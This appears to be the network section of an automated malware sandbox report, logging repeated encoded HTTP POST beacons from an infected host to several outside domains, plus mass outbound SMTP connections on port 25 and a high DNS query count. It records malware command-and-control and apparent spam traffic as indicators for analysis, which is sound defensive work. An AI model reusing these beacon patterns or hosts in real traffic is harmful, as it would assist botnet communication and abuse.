2f 33 57 74 2b 71 76 45 56 47 6f 68 38 6e 58 4e 67 46 54 37 62 72 53 66 78 33 62 6e 57 4a 4d 6e 46 47 4b 6e 6e 78 57 49 72 4c 4a 6c 6d 69 75 58 33 6f 70 59 45 42 6e 43 43 57 75 4d 31 70 50 41 72 6a 31 30 7a 34 73 44 63 6c 50 31 47 41 55 69 49 73 77 54 30 30 2b 65 37 78 6f 34 68 41 49 35 73 73 37 30 45 2f 43 46 2b 44 6c 44 76 63 56 4a 41 6c 37 53 6c 77 71 38 56 42 45 4f 43 42 70 4e 74 76 49 65 37 63 34 50 67 37 57 70 4e 6b 33 48 72 58 34 52 5a 42 34 79 39 43 74 56 42 61 65 6f 68 30 55 38 63 76 52 4c 68 53 4d 71 50 66 76 5a 61 57 4f 2f 74 66 76 46 74 6c 73 49 34 68 68 70 72 41 57 67 72 79 53 4b 6f 77 6b 6a 53 5a 4f 54 74 34 78 51 4d 47 56 66 31 36 30 41 4d 6d 31 6f 30 3d Data Ascii: gUzGg+xIqpZu/vxg168u2/8ejxdEyA5J4DDFbDmm2tZKf4VunmJpyaB6D8NszQB4SNDW3fczoSQfwzvlOkQVsQ24fmDa1a8p7pus2g5MvBZH3BXInobiZ34s8kx4u8tsWbdM0epVVMPngioz4PuRwbT/BzAcQ1MT1mJTEJcDmqv1V4tOCSL1HILNBOhp3mGSr3rH5XQ6zwKNVWhPmPpUTIpP+wsBWC5LpQE2XWGXNOloseLHERLUzV+XnQEk4mLeCOYygr8QPQ44xPJelUx52EI351m8XUayFVPVRfpjcBTIxRdKv4dnyRlarGYPtIuotsOCoYX+jyK2tVmY7xSThlh2UaA09Eh93F/3Wt+qvEVGoh8nXNgFT7brSfx3bnWJMnFGKnnxWIrLJlmiuX3opYEBnCCWuM1pPArj10z4sDclP1GAUiIswT00+e7xo4hAI5ss70E/CF+DlDvcVJAl7Slwq8VBEOCBpNtvIe7c4Pg7WpNk3HrX4RZB4y9CtVBaeoh0U8cvRLhSMqPfvZaWO/tfvFtlsI4hhprAWgrySKowkjSZOTt4xQMGVf160AMm1o0=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 53 72 56 2f 4a 53 59 35 70 35 5a 44 2f 53 4f 77 77 66 35 6e 47 45 6d 4a 6a 72 34 47 33 6a 4a 50 75 6c 38 33 50 65 50 6b 62 41 68 4b 4a 6f 7a 6e 39 32 36 48 33 39 64 78 4e 6b 78 43 43 37 44 71 70 2f 75 67 66 4f 45 30 53 52 50 75 70 79 47 49 52 74 78 65 57 50 79 6e 53 74 35 62 70 4c 31 39 48 77 30 37 4a 6f 6c 36 58 73 31 4a 31 71 46 33 4f 30 77 50 70 62 53 44 4b 61 68 49 50 73 4e 49 33 33 71 58 78 42 39 69 68 73 6a 63 53 48 38 72 45 57 7a 42 59 62 77 79 70 33 49 75 71 44 68 70 31 38 6a 6e 32 6d 49 61 6f 4e 4f 6a 52 64 62 6a 77 57 69 54 4e 7a 6e 46 44 44 57 6e 53 46 65 63 4b 67 43 47 54 78 58 6f 65 31 34 71 43 70 6c 58 76 2b 68 71 36 51 52 4d 76 47 37 4b 38 5a 52 37 45 5a 56 4e 44 74 36 66 6a 77 38 47 31 6b 42 41 69 41 32 5a 6c 31 63 48 74 38 61 6f 74 47 34 51 46 63 64 74 76 69 55 52 47 47 55 4c 61 77 69 6b 47 6f 32 6f 59 65 37 39 66 42 44 73 7a 52 61 6e 46 42 66 35 44 37 33 30 77 62 56 64 6b 74 4f 57 74 56 4b 76 6b 76 33 65 71 48 77 67 2f 53 74 78 43 53 41 47 79 6e 45 2f 4b 46 49 48 55 6a 68 6c 6e 72 77 55 53 45 39 75 77 62 4d 75 33 37 61 41 4b 48 59 73 55 65 6c 7a 78 68 6b 66 4f 5a 6a 58 6f 55 30 33 6e 69 69 56 39 2f 46 54 79 56 57 58 45 59 63 69 44 46 34 43 51 2b 7a 2f 54 75 4e 53 72 63 35 63 57 38 78 2f 41 70 5a 64 51 6c 71 6e 53 75 65 43 71 61 54 79 64 74 2b 50 30 6d 5a 4e 74 65 50 70 67 78 46 38 50 2b 62 61 56 68 45 48 57 6d 34 51 41 63 70 73 33 32 49 7a 2f 44 7a 55 61 71 79 58 50 49 46 53 43 30 58 32 58 54 45 55 6c 75 34 5a 39 76 6b 4a 67 71 35 42 2f 38 47 56 52 68 30 4a 6d 5a 73 6d 66 42 6b 42 34 61 6b 64 45 47 49 61 66 66 76 58 33 48 2b 55 6d 33 2b 70 76 36 49 42 41 76 57 76 7a 6e 34 5a 4f 52 4d 35 72 78 42 73 43 4a 67 3d Data Ascii: SrV/JSY5p5ZD/SOwwf5nGEmJjr4G3jJPul83PePkbAhKJozn926H39dxNkxCC7Dqp/ugfOE0SRPupyGIRtxeWPynSt5bpL19Hw07Jol6Xs1J1qF3O0wPpbSDKahIPsNI33qXxB9ihsjcSH8rEWzBYbwyp3IuqDhp18jn2mIaoNOjRdbjwWiTNznFDDWnSFecKgCGTxXoe14qCplXv+hq6QRMvG7K8ZR7EZVNDt6fjw8G1kBAiA2Zl1cHt8aotG4QFcdtviURGGULawikGo2oYe79fBDszRanFBf5D730wbVdktOWtVKvkv3eqHwg/StxCSAGynE/KFIHUjhlnrwUSE9uwbMu37aAKHYsUelzxhkfOZjXoU03niiV9/FTyVWXEYciDF4CQ+z/TuNSrc5cW8x/ApZdQlqnSueCqaTydt+P0mZNtePpgxF8P+baVhEHWm4QAcps32Iz/DzUaqyXPIFSC0X2XTEUlu4Z9vkJgq5B/8GVRh0JmZsmfBkB4akdEGIaffvX3H+Um3+pv6IBAvWvzn4ZORM5rxBsCJg=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 53 4b 46 54 38 47 48 50 72 5a 5a 4d 76 70 75 58 77 43 46 63 5a 44 72 75 7a 45 70 66 48 4c 6e 41 4a 66 52 6c 52 78 75 5a 6b 79 31 77 49 46 43 47 31 58 31 30 65 42 63 30 72 53 70 4d 4b 74 6e 79 55 75 2f 45 41 38 53 42 6c 53 6b 77 47 7a 61 4f 75 6c 4c 78 4b 78 38 61 47 68 73 52 51 4a 70 59 63 68 4e 75 41 65 2b 30 4d 50 31 69 6d 32 68 71 35 79 4f 6f 56 70 4f 4b 79 68 58 36 61 71 45 46 6c 72 50 38 72 2f 39 69 32 43 6d 74 45 54 35 67 50 71 72 36 48 63 6b 64 59 61 4d 39 41 37 39 5a 78 6e 62 64 46 56 2b 77 39 5a 46 38 59 51 5a 6f 49 56 47 55 33 70 78 38 35 49 39 38 63 41 32 69 32 4e 2f 78 58 52 42 70 49 35 66 6e 46 54 39 5a 71 47 6a 4b 75 65 4d 53 37 70 5a 6d 76 4b 30 77 35 72 49 6c 44 55 66 53 47 6f 54 71 6f 6f 74 77 65 42 49 71 77 4e 42 48 45 44 66 39 52 38 54 76 51 2f 79 71 55 39 30 37 71 48 76 58 33 57 39 44 35 6b 49 4d 6e 75 37 35 44 36 63 79 77 74 75 71 67 2f 62 51 32 5a 72 52 65 56 69 55 48 45 2b 47 54 49 7a 4b 58 70 6e 47 63 37 66 69 59 36 42 61 36 38 4c 56 4e 34 42 55 34 5a 5a 53 76 77 4a 52 32 75 67 44 38 34 32 69 74 73 66 4b 52 56 42 38 64 36 44 4b 37 2f 58 6f 79 62 62 54 39 68 6a 36 36 39 4f 41 57 4a 63 7a 47 62 32 73 45 51 53 30 2b 54 39 4e 71 39 6f 5a 37 56 64 44 78 73 45 4a 78 48 79 68 6d 72 6c 32 2b 42 58 77 4c 52 59 52 73 6f 53 55 2f 50 72 58 4f 6d 67 72 7a 48 6d 54 62 72 67 52 7a 66 52 75 68 38 4c 37 72 5a 33 76 66 41 30 37 34 6c 2f 6a 47 72 30 51 68 47 5a 43 54 4b 6e 5a 72 48 4a 51 59 54 43 33 4e 35 35 30 46 56 70 4b 54 58 32 34 4e 57 45 42 50 6a 6d 4c 4b 48 6f 51 63 75 67 4e 6a 6f 33 79 6c 34 39 6c 47 6b 64 67 70 37 58 77 49 43 4f 53 45 68 48 31 Data Ascii: SKFT8GHPrZZMvpuXwCFcZDruzEpfHLnAJfRlRxuZky1wIFCG1X10eBc0rSpMKtnyUu/EA8SBlSkwGzaOulLxKx8aGhsRQJpYchNuAe+0MP1im2hq5yOoVpOKyhX6aqEFlrP8r/9i2CmtET5gPqr6HckdYaM9A79ZxnbdFV+w9ZF8YQZoIVGU3px85I98cA2i2N/xXRBpI5fnFT9ZqGjKueMS7pZmvK0w5rIlDUfSGoTqootweBIqwNBHEDf9R8TvQ/yqU907qHvX3W9D5kIMnu75D6cywtuqg/bQ2ZrReViUHE+GTIzKXpnGc7fiY6Ba68LVN4BU4ZZSvwJR2ugD842itsfKRVB8d6DK7/XoybbT9hj669OAWJczGb2sEQS0+T9Nq9oZ7VdDxsEJxHyhmrl2+BXwLRYRsoSU/PrXOmgrzHmTbrgRzfRuh8L7rZ3vfA074l/jGr0QhGZCTKnZrHJQYTC3N550FVpKTX24NWEBPjmLKHoQcugNjo3yl49lGkdgp7XwICOSEhH1
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 2b 69 56 55 67 7a 68 46 71 70 62 52 55 61 46 38 75 38 63 67 66 53 76 35 31 78 71 41 47 4a 4d 75 37 4b 74 59 56 61 4b 70 64 6a 66 54 35 76 34 47 73 59 55 79 2f 4a 38 74 65 71 6d 6c 6a 31 36 37 32 71 76 76 70 66 48 4b 35 71 50 4a 67 78 45 2b 33 5a 51 56 6f 47 76 44 70 4d 64 75 6c 65 41 79 71 2b 69 46 79 32 37 79 4f 76 50 33 63 37 6e 6b 47 46 7a 51 39 67 73 5a 52 54 35 2f 71 61 52 66 4d 52 63 69 4f 68 69 62 73 6e 65 70 2f 57 51 42 49 5a 43 53 55 4a 2b 67 36 41 6f 4d 54 37 77 43 4c 47 35 67 55 79 69 7a 6b 32 4b 73 53 4a 63 78 4d 57 61 52 43 55 65 62 4f 2b 6d 64 77 69 64 56 55 6a 68 50 56 30 58 52 2f 45 56 42 65 55 58 38 56 75 41 67 69 48 32 73 38 78 6a 6c 30 46 5a 43 6f 76 4e 6e 31 71 32 6d 31 39 6f 6f 6a 4f 74 61 35 74 63 64 36 63 67 44 69 4e 77 44 36 43 71 56 33 55 53 56 55 5a 36 53 62 6e 4e 6d 69 33 56 4b 72 70 41 66 76 55 71 57 38 36 30 49 79 50 44 6f 48 37 4b 4b 66 41 59 54 49 39 4c 6a 68 6b 2b 72 33 44 64 78 46 30 4f 63 52 33 75 39 43 53 41 66 51 65 78 57 72 55 74 74 36 72 45 50 36 35 4e 71 55 42 2b 55 6b 50 4f 51 34 71 65 32 51 43 59 4e 42 75 6b 74 55 4b 72 45 52 45 4d 6c 2f 43 59 35 45 77 41 65 32 71 50 76 78 38 56 56 66 54 31 33 50 4c 55 31 2b 58 2f 57 38 76 6c 46 47 71 75 6f 6a 69 34 4c 4a 71 7a 50 4b 5a 58 47 65 71 2f 68 68 68 56 55 53 4a 64 54 6b 6b 69 39 35 62 73 64 6e 2b 6a 53 7a 5a 77 55 4a 51 58 79 4f 6a 62 50 47 2f 4f 4a 36 79 51 30 6d 4d 55 62 47 6a 52 51 2f 4b 71 33 67 5a 4c 46 64 78 36 7a 31 77 41 70 65 39 49 4e 2b 73 34 49 73 78 31 53 79 57 4d 6e 5a 76 6a 38 4b 46 34 6f 37 46 79 52 76 64 78 55 68 56 58 33 58 6c 72 4d 42 41 4e 6a 51 35 4b 65 37 77 2f 70 4f 57 66 76 4c 64 77 33 36 56 4f 35 67 61 6f 63 4f 75 68 61 37 46 73 66 51 78 39 4e 2b 2f 78 45 2b 41 6a 2f 6a 75 51 56 72 45 57 37 70 59 7a 52 6d 41 3d 3d Data Ascii: +iVUgzhFqpbRUaF8u8cgfSv51xqAGJMu7KtYVaKpdjfT5v4GsYUy/J8teqmlj1672qvvpfHK5qPJgxE+3ZQVoGvDpMduleAyq+iFy27yOvP3c7nkGFzQ9gsZRT5/qaRfMRciOhibsnep/WQBIZCSUJ+g6AoMT7wCLG5gUyizk2KsSJcxMWaRCUebO+mdwidVUjhPV0XR/EVBeUX8VuAgiH2s8xjl0FZCovNn1q2m19oojOta5tcd6cgDiNwD6CqV3USVUZ6SbnNmi3VKrpAfvUqW860IyPDoH7KKfAYTI9Ljhk+r3DdxF0OcR3u9CSAfQexWrUtt6rEP65NqUB+UkPOQ4qe2QCYNBuktUKrEREMl/CY5EwAe2qPvx8VVfT13PLU1+X/W8vlFGquoji4LJqzPKZXGeq/hhhVUSJdTkki95bsdn+jSzZwUJQXyOjbPG/OJ6yQ0mMUbGjRQ/Kq3gZLFdx6z1wApe9IN+s4Isx1SyWMnZvj8KF4o7FyRvdxUhVX3XlrMBANjQ5Ke7w/pOWfvLdw36VO5gaocOuha7FsfQx9N+/xE+Aj/juQVrEW7pYzRmA==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 75 47 77 4e 30 75 30 6a 74 5a 59 66 58 56 55 59 35 44 51 58 6b 71 59 4f 70 67 54 62 53 54 66 65 63 53 4d 43 79 33 50 67 4c 4e 30 2b 4d 63 51 30 53 6e 38 6d 71 41 42 48 41 75 7a 4a 6e 45 72 39 66 4a 69 39 7a 38 6b 47 30 7a 61 6c 76 2b 79 6f 76 6b 33 43 4e 6b 68 50 66 45 78 72 69 45 2f 71 47 61 6c 44 74 35 31 61 36 4c 64 64 36 64 31 78 49 43 74 4f 38 54 59 43 6d 4f 7a 62 31 33 77 32 46 44 6d 43 72 2f 43 33 73 41 6d 6e 45 50 76 55 72 55 4b 5a 44 49 74 55 73 32 46 55 46 46 75 74 6b 6f 62 77 58 66 52 41 74 61 56 7a 36 6b 62 7a 61 59 49 6f 63 51 64 70 39 75 77 37 32 79 65 53 42 65 78 74 65 4d 7a 53 6b 30 55 79 70 4d 45 7a 37 64 35 72 2f 52 2f 66 46 51 33 64 45 52 69 42 4a 79 70 6d 30 53 50 47 4d 70 4a 55 76 77 47 6d 44 53 33 70 69 57 6a 58 69 31 45 41 44 45 56 42 70 64 2b 34 52 78 30 68 33 37 6d 31 46 73 52 37 59 33 72 30 48 69 38 59 4b 42 72 44 74 63 63 78 4c 75 6a 66 6d 67 7a 31 42 5a 47 51 66 64 51 47 75 4d 66 6b 75 4d 4c 5a 33 55 34 4f 4c 6f 6e 36 72 44 72 4a 79 38 67 49 50 57 71 69 4e 45 50 52 64 72 51 56 6f 56 72 34 33 34 37 68 57 32 77 2b 65 77 4e 55 35 30 4a 76 65 41 51 39 53 65 63 6d 31 30 78 66 47 43 43 33 47 4d 48 4a 54 66 77 33 46 71 2b 70 4d 7a 57 4e 46 77 78 52 50 45 32 63 35 49 4f 36 38 33 5a 58 74 73 7a 2b 6f 72 70 74 44 48 46 49 6d 4f 34 6a 41 54 51 58 49 47 6f 49 52 6a 56 76 6b 6c 66 4c 67 72 31 79 43 30 6c 63 69 4b 38 58 4d 30 6c 6c 42 48 36 62 35 30 62 5a 4f 65 73 58 47 4a 72 65 72 44 69 2b 4e 4a 6d 69 38 48 52 52 6a 33 73 54 37 76 48 50 5a 63 70 2f 72 54 63 4a 76 6d 52 65 59 55 66 44 61 4b 36 41 55 50 62 2f 6a 44 4c 35 54 65 75 6c 32 6a 44 38 4c 62 55 4a 56 62 41 75 6b 48 48 58 31 67 74 48 39 74 7a 71 30 57 55 6a 39 41 4e 65 5a 68 38 44 2b 61 5a 52 75 7a 70 6c 42 42 6d 2b 41 55 4f 4e 62 51 4a 68 Data Ascii: uGwN0u0jtZYfXVUY5DQXkqYOpgTbSTfecSMCy3PgLN0+McQ0Sn8mqABHAuzJnEr9fJi9z8kG0zalv+yovk3CNkhPfExriE/qGalDt51a6Ldd6d1xICtO8TYCmOzb13w2FDmCr/C3sAmnEPvUrUKZDItUs2FUFFutkobwXfRAtaVz6kbzaYIocQdp9uw72yeSBexteMzSk0UypMEz7d5r/R/fFQ3dERiBJypm0SPGMpJUvwGmDS3piWjXi1EADEVBpd+4Rx0h37m1FsR7Y3r0Hi8YKBrDtccxLujfmgz1BZGQfdQGuMfkuMLZ3U4OLon6rDrJy8gIPWqiNEPRdrQVoVr4347hW2w+ewNU50JveAQ9Secm10xfGCC3GMHJTfw3Fq+pMzWNFwxRPE2c5IO683ZXtsz+orptDHFImO4jATQXIGoIRjVvklfLgr1yC0lciK8XM0llBH6b50bZOesXGJrerDi+NJmi8HRRj3sT7vHPZcp/rTcJvmReYUfDaK6AUPb/jDL5Teul2jD8LbUJVbAukHHX1gtH9tzq0WUj9ANeZh8D+aZRuzplBBm+AUONbQJh
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 53 72 56 2f 4a 53 59 35 70 35 5a 44 2f 53 4f 77 77 66 35 6e 47 45 6d 4a 6a 72 34 47 33 6a 4a 50 75 6c 38 33 50 65 50 6b 62 41 68 4b 4a 6f 7a 6e 39 32 36 48 33 39 64 78 4e 6b 78 43 43 37 44 71 70 2f 75 67 66 4f 45 30 53 52 50 75 70 79 47 49 52 74 78 65 57 50 79 6e 53 74 35 62 70 4c 31 39 48 77 30 37 4a 6f 6c 36 58 73 31 4a 31 71 46 33 4f 30 77 50 70 62 53 44 4b 61 68 49 50 73 4e 49 33 33 71 58 78 42 39 69 68 73 6a 63 53 48 38 72 45 57 7a 42 59 62 77 79 70 33 49 75 71 44 68 70 31 38 6a 6e 32 6d 49 61 6f 4e 4f 6a 52 64 62 6a 77 57 69 54 4e 7a 6e 46 44 44 57 6e 53 46 65 63 4b 67 43 47 54 78 58 6f 65 31 34 71 43 70 6c 58 76 2b 68 71 36 51 52 4d 76 47 37 4b 38 5a 52 37 45 5a 56 4e 44 74 36 66 6a 77 38 47 31 6b 42 41 69 41 32 5a 6c 31 63 48 74 38 61 6f 74 47 34 51 46 63 64 74 76 69 55 52 47 47 55 4c 61 77 69 6b 47 6f 32 6f 59 65 37 39 66 42 44 73 7a 52 61 6e 46 42 66 35 44 37 33 30 77 62 56 64 6b 74 4f 57 74 56 4b 76 6b 76 33 65 71 48 77 67 2f 53 74 78 43 53 41 47 79 6e 45 2f 4b 46 49 48 55 6a 68 6c 6e 72 77 55 53 45 39 75 77 62 4d 75 33 37 61 41 4b 48 59 73 55 65 6c 7a 78 68 6b 66 4f 5a 6a 58 6f 55 30 33 6e 69 69 56 39 2f 46 54 79 56 57 58 45 59 63 69 44 46 34 43 51 2b 7a 2f 54 75 4e 53 72 63 35 63 57 38 78 2f 41 70 5a 64 51 6c 71 6e 53 75 65 43 71 61 54 79 64 74 2b 50 30 6d 5a 4e 74 65 50 70 67 78 46 38 50 2b 62 61 56 68 45 48 57 6d 34 51 41 63 70 73 33 32 49 7a 2f 44 7a 55 61 71 79 58 50 49 46 53 43 30 58 32 58 54 45 55 6c 75 34 5a 39 76 6b 4a 67 71 35 42 2f 38 47 56 52 68 30 4a 6d 5a 73 6d 66 42 6b 42 34 61 6b 64 45 47 49 61 66 66 76 58 33 48 2b 55 6d 33 2b 70 76 36 49 42 41 76 57 76 7a 6e 34 5a 4f 52 4d 35 72 78 42 73 43 4a 67 3d Data Ascii: SrV/JSY5p5ZD/SOwwf5nGEmJjr4G3jJPul83PePkbAhKJozn926H39dxNkxCC7Dqp/ugfOE0SRPupyGIRtxeWPynSt5bpL19Hw07Jol6Xs1J1qF3O0wPpbSDKahIPsNI33qXxB9ihsjcSH8rEWzBYbwyp3IuqDhp18jn2mIaoNOjRdbjwWiTNznFDDWnSFecKgCGTxXoe14qCplXv+hq6QRMvG7K8ZR7EZVNDt6fjw8G1kBAiA2Zl1cHt8aotG4QFcdtviURGGULawikGo2oYe79fBDszRanFBf5D730wbVdktOWtVKvkv3eqHwg/StxCSAGynE/KFIHUjhlnrwUSE9uwbMu37aAKHYsUelzxhkfOZjXoU03niiV9/FTyVWXEYciDF4CQ+z/TuNSrc5cW8x/ApZdQlqnSueCqaTydt+P0mZNtePpgxF8P+baVhEHWm4QAcps32Iz/DzUaqyXPIFSC0X2XTEUlu4Z9vkJgq5B/8GVRh0JmZsmfBkB4akdEGIaffvX3H+Um3+pv6IBAvWvzn4ZORM5rxBsCJg=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheCookie: myro_ct_dtl=eyJSRVFVRVNUX1VSSSI6IlwvIiwiUkVESVJFQ1RfVU5JUVVFX0lEIjoiWlFQcTllMUhuNGtUcTMtXzF3WXVEZ0FBQUR3IiwiUkVESVJFQ1RfU0NSSVBUX1VSTCI6IlwvIiwiUkVESVJFQ1RfU0NSSVBUX1VSSSI6Imh0dHA6XC9cL3d3dy5teXJvcGNiLmNvbVwvIiwiUkVESVJFQ1RfRE9DVU1FTlRfUk9PVCI6Ilwva3VuZGVuXC9ob21lcGFnZXNcLzlcL2QzMjgxNTE4NDdcL2h0ZG9jc1wvY2xpY2thbmRidWlsZHNcL215cm9wY2IiLCJSRURJUkVDVF9IVFRQX0FVVEhPUklaQVRJT04iOiIiLCJSRURJUkVDVF9IQU5ETEVSIjoieC1tYXBwLXBocDUiLCJSRURJUkVDVF9TVEFUVVMiOiIyMDAiLCJVTklRVUVfSUQiOiJaUVBxOWUxSG40a1RxMy1fMXdZdURnQUFBRHciLCJTQ1JJUFRfVVJMIjoiXC8iLCJTQ1JJUFRfVVJJIjoiaHR0cDpcL1wvd3d3Lm15cm9wY2IuY29tXC8iLCJIVFRQX0hPU1QiOiJ3d3cubXlyb3BjYi5jb20iLCJDT05URU5UX0xFTkdUSCI6IjU3NiIsIkhUVFBfQUNDRVBUIjoiKlwvKiIsIkhUVFBfQUNDRVBUX0xBTkdVQUdFIjoiZW4tdXMiLCJDT05URU5UX1RZUEUiOiJhcHBsaWNhdGlvblwvb2N0ZXQtc3RyZWFtIiwiSFRUUF9VU0VSX0FHRU5UIjoiTW96aWxsYVwvNC4wIChjb21wYXRpYmxlOyBNU0lFIDYuMDsgV2luZG93cyBOVCA1LjE7IFNWMSkiLCJIVFRQX0NBQ0hFX0NPTlRST0wiOiJuby1jYWNoZSIsIlJFTU9URV9BRERSIjoiMTkxLjk2LjE1MC4yMDkiLCJSRVFVRVNUX1NDSEVNRSI6Imh0dHAiLCJDT05URVhUX1BSRUZJWCI6Ilwvc3lzdGVtLWJpblwvIiwiQ09OVEVYVF9ET0NVTUVOVF9ST09UIjoiXC9rdW5kZW5cL3VzclwvbGliXC9jZ2ktYmluXC8iLCJSRU1PVEVfUE9SVCI6IjIwNDIyIiwiUkVESVJFQ1RfVVJMIjoiXC9pbmRleC5waHAiLCJSRVFVRVNUX01FVEhPRCI6IlBPU1QiLCJRVUVSWV9TVFJJTkciOiIiLCJTQ1JJUFRfTkFNRSI6IlwvaW5kZXgucGhwIiwiU1RBVFVTIjoiMjAwIiwiT1JJR19QQVRIX0lORk8iOiJcL2luZGV4LnBocCIsIk9SSUdfUEFUSF9UUkFOU0xBVEVEIjoiXC9rdW5kZW5cL2hvbWVwYWdlc1wvOVwvZDMyODE1MTg0N1wvaHRkb2NzXC9jbGlja2FuZGJ1aWxkc1wvbXlyb3BjYlwvaW5kZXgucGhwIiwiUEhQX1NFTEYiOiJcL2luZGV4LnBocCIsIlJFUVVFU1RfVElNRV9GTE9BVCI6MTY5NDc1NTU3My4yODU0MDMsIlJFUVVFU1RfVElNRSI6MTY5NDc1NTU3MywiYXJndiI6W10sImFyZ2MiOjB9; myro_ct=eyJ1cmwiOiIiLCJpcCI6IjE5MS45Ni4xNTAuMjA5In0%3D; shield-notbot-nonce=baba4ffe82
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.koz1.netCache-Control: no-cacheCookie: btst=179af1c99b99e03c4cb38fd6cbcfb839|191.96.150.209|1694755619|1694755593|8|3|0; snkz=191.96.150.209Data Raw: 62 32 71 46 30 44 51 58 74 5a 5a 30 32 70 74 33 6a 39 6e 7a 54 6f 63 6f 6b 35 67 73 36 4f 2f 46 71 4d 63 50 4f 36 77 79 48 6a 64 31 63 6f 62 34 56 68 4c 39 79 7a 6f 37 45 46 55 6b 47 78 71 36 74 38 4f 5a 53 4b 50 7a 49 5a 30 66 35 42 65 75 74 62 32 42 31 42 53 4f 53 79 74 54 48 2f 6a 59 4c 74 67 44 32 52 49 53 70 47 4a 4e 62 62 63 33 44 2f 4a 5a 30 38 6e 4f 74 61 4d 61 55 54 2b 4d 35 2f 58 78 7a 6e 64 6d 74 75 64 5a 6a 37 6e 37 46 42 78 73 34 53 78 4a 36 5a 59 34 46 45 34 33 50 77 73 66 66 70 73 63 77 72 54 48 6f 7a 5a 6d 61 58 2f 66 76 73 6c 59 76 6a 56 38 65 6b 75 50 65 58 6a 47 58 4e 39 50 6e 6b 53 4c 37 6b 6d 51 4e 71 2f 53 2f 30 4f 46 52 68 32 4f 59 57 76 76 47 4e 73 67 62 57 6b 69 5a 32 77 38 44 56 6b 57 41 4d 74 56 4e 39 74 64 52 37 4e 2b 43 62 69 47 42 57 6d 49 57 52 64 33 74 6b 63 6f 75 67 32 6f 4c 57 57 4a 42 52 70 33 48 49 49 47 38 67 45 61 70 65 76 50 36 37 55 36 6f 41 73 61 41 6f 2b 77 30 41 46 76 55 6d 74 7a 69 4e 37 42 41 7a 33 73 41 51 59 55 67 4d 33 33 69 34 46 70 7a 6a 67 6a 43 69 74 79 78 53 41 63 32 4c 72 4a 54 69 71 77 58 2f 72 6c 6f 31 4d 55 66 34 31 6b 79 79 4e 6a 52 39 2b 4e 66 45 63 67 64 2f 31 53 53 4c 46 62 52 62 4f 76 75 32 45 33 43 32 74 57 32 38 54 4d 33 55 42 54 56 35 4b 43 53 39 4f 4a 31 62 4b 6a 77 4b 4f 4a 6c 69 54 65 31 37 31 57 54 4d 4b 41 38 4f 47 70 50 2b 6c 63 57 50 42 32 32 4d 59 7a 6c 31 59 30 46 56 6b 4a 55 76 4e 65 55 37 6e 6d 42 61 49 31 4e 6d 6d 54 73 71 65 41 52 4d 44 34 62 43 72 78 72 65 63 38 59 2b 64 59 63 44 41 56 37 30 56 71 38 33 55 55 59 63 72 56 52 71 32 7a 45 79 5a 63 63 6c 50 2b 6a 37 4f 56 47 65 6a 6c 6b 71 64 59 33 55 62 6e 75 44 52 67 59 57 55 3d Data Ascii: b2qF0DQXtZZ02pt3j9nzTocok5gs6O/FqMcPO6wyHjd1cob4VhL9yzo7EFUkGxq6t8OZSKPzIZ0f5Beutb2B1BSOSytTH/jYLtgD2RISpGJNbbc3D/JZ08nOtaMaUT+M5/XxzndmtudZj7n7FBxs4SxJ6ZY4FE43PwsffpscwrTHozZmaX/fvslYvjV8ekuPeXjGXN9PnkSL7kmQNq/S/0OFRh2OYWvvGNsgbWkiZ2w8DVkWAMtVN9tdR7N+CbiGBWmIWRd3tkcoug2oLWWJBRp3HIIG8gEapevP67U6oAsaAo+w0AFvUmtziN7BAz3sAQYUgM33i4FpzjgjCityxSAc2LrJTiqwX/rlo1MUf41kyyNjR9+NfEcgd/1SSLFbRbOvu2E3C2tW28TM3UBTV5KCS9OJ1bKjwKOJliTe171WTMKA8OGpP+lcWPB22MYzl1Y0FVkJUvNeU7nmBaI1NmmTsqeARMD4bCrxrec8Y+dYcDAV70Vq83UUYcrVRq2zEyZcclP+j7OVGejlkqdY3UbnuDRgYWU=
              Source: unknownNetwork traffic detected: DNS query count 442
              Source: unknownNetwork traffic detected: IP country count 20
              Source: global trafficTCP traffic: 192.168.2.3:49999 -> 66.218.88.167:25
              Source: global trafficTCP traffic: 192.168.2.3:50064 -> 66.226.70.66:25
              Source: global trafficTCP traffic: 192.168.2.3:50092 -> 133.125.38.187:25
              Source: global trafficTCP traffic: 192.168.2.3:50095 -> 64.18.191.61:25
              Source: global trafficTCP traffic: 192.168.2.3:50098 -> 31.15.12.103:25
              Source: global trafficTCP traffic: 192.168.2.3:50100 -> 104.20.221.29:25
              Source: global trafficTCP traffic: 192.168.2.3:50104 -> 104.21.26.121:25
              Source: global trafficTCP traffic: 192.168.2.3:50105 -> 54.217.118.81:25
              Source: global trafficTCP traffic: 192.168.2.3:50116 -> 5.181.161.11:25
              Source: global trafficTCP traffic: 192.168.2.3:50117 -> 61.200.81.21:25
              Source: global trafficTCP traffic: 192.168.2.3:50118 -> 216.239.32.21:25
              Source: global trafficTCP traffic: 192.168.2.3:50119 -> 104.21.27.205:25
              Source: global trafficTCP traffic: 192.168.2.3:50127 -> 78.46.224.133:25
